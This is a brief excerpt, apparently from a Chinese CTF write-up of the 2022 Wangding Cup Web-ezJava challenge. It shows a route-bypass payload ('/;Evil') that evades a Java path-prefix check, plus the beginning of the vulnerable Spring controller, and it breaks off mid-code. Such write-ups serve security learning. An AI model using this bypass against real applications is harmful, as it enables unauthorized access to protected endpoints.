about CTF::2022年网鼎杯玄武组赛题复盘-[Web-ezJava]::
Web-ezJava赛题复盘 路由绕过 payload http://localhost/;Evil 绕过 if (path.startsWith("/Evil")) @ResponseBody @RequestMapping({"/Evil"}) public String Evil(HttpServletRequest request, HttpServletResponse response) throws IOException, ClassNotFoundException { String path = r...